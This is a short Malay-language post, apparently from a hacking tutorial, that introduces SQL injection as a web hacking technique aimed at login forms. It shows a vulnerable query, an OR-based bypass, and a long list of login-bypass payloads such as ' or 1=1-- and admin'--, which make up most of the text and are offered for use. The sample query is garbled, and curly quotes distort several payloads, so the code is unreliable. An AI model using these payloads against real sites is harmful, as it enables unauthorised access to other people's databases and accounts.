SQL Injection

· SQL (Structured Query Language) - bahasa komputer standard yg ditetapkan oleh ANSI (American National Standard Institute)

· Tujuan- untuk mengakses dan memanupulasi sistem database.

· SQL - bekerja dgn program2 database seperti MS Access, DB 2, Informix, MS SQL Server, Oracle, Sybase etc.

· SQL Injection attack - salah satu teknik utk melakukan web hacking.

· Mencapai akses pada sistem database yg berbasis SQL.

· SQL Injection nie biasanya kita lakukan pada username dan password

· Cth: SQLQuery=”SELECT Username FROM Users WHERE Username=”‘&strUsername&”’strpassword&”‘

· Cth: gunakan string OR - SELECT Username FROM Users WHERE Username=”OR”=” AND Password=”OR”=”

· Untuk melakukan proses “hacking” kita menggunakan magic code.

· Terdapat pelbagai contoh magic code yang boleh digunakan, seperti:

• or 1=1–
  

• ‘or 0=0 –
  

• ‘or ‘x’='x

• ‘or a=a-

• “or 0=0 –

• “or 0=0 #

• “or “x”=”x

• “)or(”a”=”a

• admin’–

• hi” or 1=1 –

• hi’ or’a'=’a

• hi”)or(”a”=”a

• or 0=0 #

• ‘or a=a–

• ‘or 0=0 #

• “or 1=1–

• “or “a”=”a

• ‘)or(’a'=’a

• ‘)or(’x'=’x

• hi” or “a”=”a

• hi’ or 1=1 –

• hi’)or(’a'=’a

• or 0=0 –

• or 1=1–